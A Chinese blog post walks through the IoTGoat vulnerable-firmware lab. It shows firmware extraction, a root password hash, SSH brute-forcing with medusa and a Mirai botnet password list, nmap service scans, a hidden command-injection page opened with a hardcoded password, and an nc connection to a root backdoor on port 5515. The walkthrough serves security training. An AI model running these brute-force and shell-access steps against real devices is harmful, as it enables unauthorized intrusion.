

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/logo.png">
  <link rel="icon" href="/img/logo.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Mr.BelieVe">
  <meta name="keywords" content="">
  
  <title>IoTGoat - Mr.BelieVe&#39;s Treasure</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","version":"1.8.9-a","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Mr.BelieVe's Treasure" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Mr.BelieVe's Treasure</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="IoTGoat">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-03 19:50" pubdate>
        2020年11月3日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      39
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">IoTGoat</h1>
            
            <div class="markdown-body">
              <h2 id="No-1-Weak-Guessable-or-Hardcoded-Passwords"><a href="#No-1-Weak-Guessable-or-Hardcoded-Passwords" class="headerlink" title="No 1: Weak, Guessable, or Hardcoded Passwords:"></a>No 1: Weak, Guessable, or Hardcoded Passwords:</h2><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gradle">$ <span class="hljs-keyword">find</span> . -name cgi-bin<br>.<span class="hljs-regexp">/www/</span>cgi-bin<br></code></pre></td></tr></table></figure>

<p>查找，<a target="_blank" rel="noopener" href="https://github.com/craigz28/firmwalker">firmwalker</a></p>
<blockquote>
<p>It will search through the extracted or mounted firmware file system for things of interest such as:</p>
<ul>
<li>etc/shadow and etc/passwd</li>
<li>list out the etc/ssl directory</li>
<li>search for SSL related files such as .pem, .crt, etc.</li>
<li>search for configuration files</li>
<li>look for script files</li>
<li>search for other .bin files</li>
<li>look for keywords such as admin, password, remote, etc.</li>
<li>search for common web servers used on IoT devices</li>
<li>search for common binaries such as ssh, tftp, dropbear, etc.</li>
<li>search for URLs, email addresses and IP addresses</li>
<li>Experimental support for making calls to the Shodan API using the Shodan CLI</li>
</ul>
</blockquote>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">$ .<span class="hljs-regexp">/firmwalker.sh ../</span>firmware<span class="hljs-regexp">/_IoTGoat-x86.img.extracted/</span>squashfs-root<span class="hljs-regexp">/ ./</span>IoTGoat.txt<br></code></pre></td></tr></table></figure>



<blockquote>
<p><strong>/etc/shadow</strong><br>保存了加密的真实密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">&gt;</span><span class="bash">root:$1$Jl7H1VOG<span class="hljs-variable">$Wgw2F</span>/C.nLNTC.4pwDa4H1:</span><br><span class="hljs-meta">&gt;</span><span class="bash">|                |</span><br><span class="hljs-meta">&gt;</span><span class="bash">1                2</span><br></code></pre></td></tr></table></figure>

<ol>
<li><p><strong>Username</strong> : It is your login name.</p>
</li>
<li><p><strong>Password</strong>: It is your encrypted password. The password should be minimum 8-12 characters long including special characters, digits, lower case alphabetic and more. Usually password format is set to</p>
<p><code>$id$salt$hashed</code>, The<code>$id</code>is the algorithm used On GNU/Linux as follows:</p>
<ol>
<li><code>$1$</code> is MD5</li>
<li><code>$2a$</code> is Blowfish</li>
<li><code>$2y$</code>is Blowfish</li>
<li><code>$5$</code> is SHA-256</li>
<li><code>$6$</code>is SHA-512</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://www.cyberciti.biz/faq/understanding-etcshadow-file/">more</a></p>
</li>
</ol>
</blockquote>
<p>爆破密码</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs awk">$ john --show .<span class="hljs-regexp">/etc/</span>shadow<br><span class="hljs-number">0</span> password hashes cracked, <span class="hljs-number">2</span> left<br></code></pre></td></tr></table></figure>

<p>hashcat也可以解密md5等，很强大但是我不大会用。。</p>
<p>medusa</p>
<blockquote>
<p>Hydra, Medusa, or Ncrack都可以用来爆破</p>
</blockquote>
<p>加上使用<a target="_blank" rel="noopener" href="https://github.com/danielmiessler/SecLists">SecList</a></p>
<blockquote>
<p>SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. </p>
</blockquote>
<p>使用命令<code>awk &#39;&#123;print $2&#125;&#39; SecLists/Passwords/Malware/mirai-botnet.txt &gt; SecLists/Passwords/Malware/mirai-botnet_passwords.txt</code>来把密码部分导出到一个文件里</p>
<p>然后</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">$ medusa -u iotgoatuser -P .<span class="hljs-regexp">/SecLists/</span>Passwords<span class="hljs-regexp">/Malware/mi</span>rai-botnet_passwords.txt -h <span class="hljs-number">192.168</span>.<span class="hljs-number">56.101</span> -M ssh<br></code></pre></td></tr></table></figure>

<p>即可爆破到ssh的密码<code>7ujMko0vizxv</code></p>
<h2 id="No-2-Insecure-Network-Services"><a href="#No-2-Insecure-Network-Services" class="headerlink" title="No 2: Insecure Network Services:"></a>No 2: Insecure Network Services:</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs sh">kali@kali:~/Desktop/IoTGoat$ nmap -p20-6000 192.168.56.101<br>Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-09 02:45 EST<br>Nmap scan report <span class="hljs-keyword">for</span> 192.168.56.101 (192.168.56.101)<br>Host is up (0.0026s latency).<br>Not shown: 5973 filtered ports<br>PORT     STATE SERVICE<br>22/tcp   open  ssh<br>25/tcp   open  smtp<br>53/tcp   open  domain                <br>80/tcp   open  http                                       110/tcp  open  pop3<br>443/tcp  open  https                                       5000/tcp open  upnp                                       5515/tcp open  unknown<br></code></pre></td></tr></table></figure>

<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ali</span>@kali:~/Desktop/IoTGoat$ sudo nmap -sU -p<span class="hljs-number">20</span>-<span class="hljs-number">6000</span> <span class="hljs-number">192.168.56.101</span> &gt; ScanUdpResult.txt                         kali@kali:~/Desktop/IoTGoat$ cat ScanUdpResult.txt <br><span class="hljs-attribute">Starting</span> Nmap <span class="hljs-number">7</span>.<span class="hljs-number">80</span> ( https://nmap.org ) at <span class="hljs-number">2020</span>-<span class="hljs-number">11</span>-<span class="hljs-number">09</span> <span class="hljs-number">03</span>:<span class="hljs-number">20</span> EST                                                 Nmap scan report for <span class="hljs-number">192.168.56.101</span> (<span class="hljs-number">192.168.56.101</span>)       Host is up (<span class="hljs-number">0</span>.<span class="hljs-number">00058</span>s latency).                             Not shown: <span class="hljs-number">5980</span> open|filtered ports                      PORT   STATE SERVICE                                       <span class="hljs-number">53</span>/udp open  domain                                       Nmap done: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned in <span class="hljs-number">16</span>.<span class="hljs-number">01</span> seconds  <br></code></pre></td></tr></table></figure>

<p>但是我的upnp好像不起作用，只能贴wp了</p>
<blockquote>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">nmap -p5000 -sV 172.16.100.213<br>Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 23:10 EDT<br>Nmap scan report for IoTGoat (172.16.100.213)<br>Host is up (0.00045s latency).<br><br>PORT     STATE SERVICE VERSION<br>5000/tcp open  upnp    MiniUPnP 2.1 (UPnP 1.1)<br>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :<br>SF-Port5000-TCP:V=7.80<span class="hljs-variable">%I=7%</span>D=5/4<span class="hljs-variable">%Time=5EB0D91A%</span>P=x86_64-pc-linux-gnu<span class="hljs-variable">%r(Gen</span><br><span class="hljs-variable">SF:ericLines,124,&quot;\x20501\x20Not\x20Implemented\r\nContent-Type:\x20text/h</span><br><span class="hljs-variable">SF:tml\r\nConnection:\x20close\r\nContent-Length:\x20149\r\nServer:\x20Ope</span><br><span class="hljs-variable">SF:nWRT/18\.06\.2\x20UPnP/1\.1\x20MiniUPnPd/2\.1\r\nExt:\r\n\r\n&lt;HTML&gt;&lt;HEA</span><br><span class="hljs-variable">SF:D&gt;&lt;TITLE&gt;501\x20Not\x20Implemented&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;Not\x20Imple</span><br><span class="hljs-variable">SF:mented&lt;/H1&gt;The\x20HTTP\x20Method\x20is\x20not\x20implemented\x20by\x20t</span><br><span class="hljs-variable">SF:his\x20server\.&lt;/BODY&gt;&lt;/HTML&gt;\r\n&quot;)%</span>r(GetRequest,117,&quot;HTTP/1<span class="hljs-symbol">\.</span>0<span class="hljs-symbol">\x</span>20404\<br>SF:x20Not<span class="hljs-symbol">\x</span>20Found<span class="hljs-symbol">\r</span><span class="hljs-symbol">\n</span>Content-Type:<span class="hljs-symbol">\x</span>20text/html<span class="hljs-symbol">\r</span><span class="hljs-symbol">\n</span>Connection:<span class="hljs-symbol">\x</span>20close<span class="hljs-symbol">\r</span><br>SF:<span class="hljs-symbol">\n</span>Content-Length:<span class="hljs-symbol">\x</span>20134<span class="hljs-symbol">\r</span><span class="hljs-symbol">\n</span>Server:<span class="hljs-symbol">\x</span>20OpenWRT/18<span class="hljs-symbol">\.</span>06<span class="hljs-symbol">\.</span>2<span class="hljs-symbol">\x</span>20UPnP/1<span class="hljs-symbol">\.</span>1<span class="hljs-symbol">\x</span><br>SF:20MiniUPnPd/2<span class="hljs-symbol">\.</span>1<span class="hljs-symbol">\r</span><span class="hljs-symbol">\n</span><br>[SNIP]<br>&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;Not<span class="hljs-symbol">\x</span>20Implemented&lt;<br>SF:/H1&gt;The<span class="hljs-symbol">\x</span>20HTTP<span class="hljs-symbol">\x</span>20Method<span class="hljs-symbol">\x</span>20is<span class="hljs-symbol">\x</span>20not<span class="hljs-symbol">\x</span>20implemented<span class="hljs-symbol">\x</span>20by<span class="hljs-symbol">\x</span>20this<span class="hljs-symbol">\x</span>20<br>SF:server<span class="hljs-symbol">\.</span>&lt;/BODY&gt;&lt;/HTML&gt;<span class="hljs-symbol">\r</span><span class="hljs-symbol">\n</span>&quot;);<br>MAC Address: 00:0C:29:00:AC:E7<br></code></pre></td></tr></table></figure>

<p>Analyze the service detection response details and note information such as the service version (<code>MiniUPnP 2.1</code>), server version (<code>OpenWrt 18.06.2</code>), as well as the error code details. Proceed with interrogating each listening services with aggressive scripts that aid in vulnerability identification based on service versioning. Try searching for appropriate <code>nmap scripts</code> in Kali Linux under <code>/usr/share/nmap/scripts</code> directory. A <code>upnp</code> example using <code>broadcast-upnp-info</code> script is shown below.</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs coq">nmap -sV --script=broadcast-upnp-info <span class="hljs-number">172.16</span><span class="hljs-number">.100</span><span class="hljs-number">.213</span><br>Starting Nmap <span class="hljs-number">7.80</span> ( https://nmap.org ) <span class="hljs-built_in">at</span> <span class="hljs-number">2020</span><span class="hljs-number">-05</span><span class="hljs-number">-04</span> <span class="hljs-number">23</span>:<span class="hljs-number">39</span> EDT<br>Pre-scan script results:<br>| <span class="hljs-type">broadcast</span>-upnp-info: <br>|   <span class="hljs-type">239</span><span class="hljs-number">.255</span><span class="hljs-number">.255</span><span class="hljs-number">.250</span><br>|       <span class="hljs-type">Server</span>: OpenWRT/<span class="hljs-number">18.06</span><span class="hljs-number">.2</span> UPnP/<span class="hljs-number">1.1</span> MiniUPnPd/<span class="hljs-number">2.1</span><br>|       <span class="hljs-type">Location</span>: http://<span class="hljs-number">192.168</span><span class="hljs-number">.50</span><span class="hljs-number">.143</span>:<span class="hljs-number">5000</span>/rootDesc.xml<br>|         <span class="hljs-type">Webserver</span>: OpenWRT/<span class="hljs-number">18.06</span><span class="hljs-number">.2</span> UPnP/<span class="hljs-number">1.1</span> MiniUPnPd/<span class="hljs-number">2.1</span><br>|         <span class="hljs-type">Name</span>: OpenWRT router<br>|         <span class="hljs-type">Manufacturer</span>: OpenWRT<br>|         <span class="hljs-type">Model</span> Descr: OpenWRT router<br>|         <span class="hljs-type">Model</span> Name: OpenWRT router<br>|         <span class="hljs-type">Model</span> Version: <span class="hljs-number">1</span><br>|         <span class="hljs-type">Name</span>: WANDevice<br>|         <span class="hljs-type">Manufacturer</span>: MiniUPnP<br>|         <span class="hljs-type">Model</span> Descr: WAN Device<br>|         <span class="hljs-type">Model</span> Name: WAN Device<br>|         <span class="hljs-type">Model</span> Version: <span class="hljs-number">20190130</span><br>|         <span class="hljs-type">Name</span>: WANConnectionDevice<br>|         <span class="hljs-type">Manufacturer</span>: MiniUPnP<br>|         <span class="hljs-type">Model</span> Descr: MiniUPnP daemon<br>|         <span class="hljs-type">Model</span> Name: MiniUPnPd<br>|<span class="hljs-type">_</span>        Model Version: <span class="hljs-number">20190130</span><br>[SNIP]<br>Nmap scan report <span class="hljs-keyword">for</span> IoTGoat (<span class="hljs-number">192.168</span><span class="hljs-number">.50</span><span class="hljs-number">.143</span>)<br>Host is up (<span class="hljs-number">0.00045</span>s latency).<br>Not shown: <span class="hljs-number">995</span> closed ports<br>PORT     STATE SERVICE  VERSION<br><span class="hljs-number">22</span>/tcp   open  ssh      Dropbear sshd (protocol <span class="hljs-number">2.0</span>)<br><span class="hljs-number">53</span>/tcp   open  domain   dnsmasq <span class="hljs-number">2.73</span><br><span class="hljs-number">80</span>/tcp   open  http     LuCI Lua http config<br><span class="hljs-number">443</span>/tcp  open  ssl/http LuCI Lua http config<br><span class="hljs-number">5000</span>/tcp open  upnp     MiniUPnP <span class="hljs-number">2.1</span> (UPnP <span class="hljs-number">1.1</span>)<br>| <span class="hljs-type">fingerprint</span>-strings: <br>|   <span class="hljs-type">FourOhFourRequest</span>, GetRequest: <br>|     <span class="hljs-type">HTTP</span>/<span class="hljs-number">1.0</span> <span class="hljs-number">404</span> Not Found<br>|     <span class="hljs-type">Content</span>-<span class="hljs-keyword">Type</span>: text/html<br>|     <span class="hljs-type">Connection</span>: close<br>|     <span class="hljs-type">Content</span>-Length: <span class="hljs-number">134</span><br>|     <span class="hljs-type">Server</span>: OpenWRT/<span class="hljs-number">18.06</span><span class="hljs-number">.2</span> UPnP/<span class="hljs-number">1.1</span> MiniUPnPd/<span class="hljs-number">2.1</span><br>|     <span class="hljs-type">Ext</span>:<br>|     <span class="hljs-type">&lt;HTML</span>&gt;&lt;HEAD&gt;&lt;TITLE&gt;<span class="hljs-number">404</span> Not Found&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;Not Found&lt;/H1&gt;The requested URL was not found on this server.&lt;/BODY&gt;&lt;/HTML&gt;<br>|   <span class="hljs-type">GenericLines</span>: <br>|     <span class="hljs-type">501</span> Not Implemented<br>|     <span class="hljs-type">Content</span>-<span class="hljs-keyword">Type</span>: text/html<br>|     <span class="hljs-type">Connection</span>: close<br>|     <span class="hljs-type">Content</span>-Length: <span class="hljs-number">149</span><br>|     <span class="hljs-type">Server</span>: OpenWRT/<span class="hljs-number">18.06</span><span class="hljs-number">.2</span> UPnP/<span class="hljs-number">1.1</span> MiniUPnPd/<span class="hljs-number">2.1</span><br>|     <span class="hljs-type">Ext</span>:<br>|     <span class="hljs-type">&lt;HTML</span>&gt;&lt;HEAD&gt;&lt;TITLE&gt;<span class="hljs-number">501</span> Not Implemented&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;H1&gt;Not Implemented&lt;/H1&gt;The HTTP Method is not implemented <span class="hljs-built_in">by</span> this server.&lt;/BODY&gt;&lt;/HTML&gt;<br>|   <span class="hljs-type">HTTPOptions</span>: <br>[SNIP] <br></code></pre></td></tr></table></figure>
</blockquote>
<h2 id="No-3-Insecure-Ecosystem-Interfaces"><a href="#No-3-Insecure-Ecosystem-Interfaces" class="headerlink" title="No 3: Insecure Ecosystem Interfaces:"></a>No 3: Insecure Ecosystem Interfaces:</h2><h3 id="隐藏的web-shell"><a href="#隐藏的web-shell" class="headerlink" title="隐藏的web shell"></a>隐藏的web shell</h3><p>在web服务器config文件<code>./etc/config/uhttpd</code>可以看到<code>lua_prefix</code></p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs elixir">kali<span class="hljs-variable">@kali</span><span class="hljs-symbol">:~/Desktop/IoTGoat/_IoTGoat-x86</span>.img.extracted/squashfs-root<span class="hljs-variable">$ </span>cat ./etc/config/uhttpd | grep <span class="hljs-string">&quot;/&quot;</span><br>        option home             /www<br>        option cert             /etc/uhttpd.crt<br>        option key              /etc/uhttpd.key<br>        <span class="hljs-comment"># Default is /cgi-bin</span><br>        option cgi_prefix       /cgi-bin<br>        list lua_prefix         <span class="hljs-string">&quot;/cgi-bin/luci=/usr/lib/lua/luci/sgi/uhttpd.lua&quot;</span><br></code></pre></td></tr></table></figure>

<p>这个lua_prefix是用来跳转到对应文件的，可参考<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_26202991/article/details/102621184">这里</a></p>
<p>然后在<code>./usr/lib/lua/luci/</code>可以看见</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs avrasm">├───<span class="hljs-keyword">cbi</span><br>├───controller<br>│   ├───admin<br>│   └───iotgoat<br>│   ├───<span class="hljs-keyword">cbi</span><br>│   │   ├───admin_network<br>│   │   ├───admin_status<br>│   │   ├───admin_system<br>│   │   │   └───fstab<br>│   │   ├───firewall<br>│   │   └───upnp<br>│   └───network<br>├───sgi<br>├───sys<br>│   └───zoneinfo<br>├───template<br>├───tools<br>    ├───admin_network<br>    │   └───index<br>    ├───admin_system<br>    ├───admin_uci<br>    ├───<span class="hljs-keyword">cbi</span><br>    ├───firewall<br>    ├───iotgoat<br>        └───bootstrap<br></code></pre></td></tr></table></figure>

<p>在<code>controller/iotgoat/iotgoat.lua</code>中可以看到index函数</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs lua"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">index</span><span class="hljs-params">()</span></span><br>    entry(&#123;<span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;iotgoat&quot;</span>&#125;, firstchild(), <span class="hljs-string">&quot;IoTGoat&quot;</span>, <span class="hljs-number">60</span>).dependent=<span class="hljs-literal">false</span><br>    entry(&#123;<span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;iotgoat&quot;</span>, <span class="hljs-string">&quot;cmdinject&quot;</span>&#125;, template(<span class="hljs-string">&quot;iotgoat/cmd&quot;</span>), <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-number">1</span>)<br>    entry(&#123;<span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;iotgoat&quot;</span>, <span class="hljs-string">&quot;cam&quot;</span>&#125;, template(<span class="hljs-string">&quot;iotgoat/camera&quot;</span>), <span class="hljs-string">&quot;Camera&quot;</span>, <span class="hljs-number">2</span>)<br>    entry(&#123;<span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;iotgoat&quot;</span>, <span class="hljs-string">&quot;door&quot;</span>&#125;, template(<span class="hljs-string">&quot;iotgoat/door&quot;</span>), <span class="hljs-string">&quot;Doorlock&quot;</span>, <span class="hljs-number">3</span>)<br>    entry(&#123;<span class="hljs-string">&quot;admin&quot;</span>, <span class="hljs-string">&quot;iotgoat&quot;</span>, <span class="hljs-string">&quot;webcmd&quot;</span>&#125;, call(<span class="hljs-string">&quot;webcmd&quot;</span>))<br><span class="hljs-keyword">end</span><br></code></pre></td></tr></table></figure>

<p>在<code>view/iotgoat/</code>里有<code>cmd.html</code></p>
<p>所以访问<code>https://&lt;IoTGoat_IP&gt;/cgi-bin/luci/admin/iotgoat/cmdinject</code>即可</p>
<p>需要登陆密码，<code>iotgoathardcodedpassword</code></p>
<p>在cmd中输入<code>telnet -p 9999</code>，linux nc即可连入</p>
<blockquote>
<p>更多有关luci可以参考</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/x_wukong/p/4505240.html">luci框架-LUA的一个web框架使用</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/openwrt/luci/wiki">openwrt luci的wiki</a></p>
</blockquote>
<h3 id="后门"><a href="#后门" class="headerlink" title="后门"></a>后门</h3><p>前面有个5515端口是未知的，nc连一下居然是后门。。</p>
<figure class="highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs tcl">nc <span class="hljs-number">192.168</span><span class="hljs-number">.56</span><span class="hljs-number">.102</span> <span class="hljs-number">5515</span><br>[***]Successfully Connected to IoTGoat&#x27;s Backdoor[***]<br><br>ls<br>bin<br>boot<br>dev<br>dnsmasq_setup.sh<br>etc<br>lib<br>mnt<br>overlay<br><span class="hljs-keyword">proc</span><br>rom<br>root<br>sbin<br>sys<br>tmp<br>usr<br>var<br>www<br><br>id<br>uid=0(root)<span class="hljs-title"> gid=0(root)</span><br></code></pre></td></tr></table></figure>

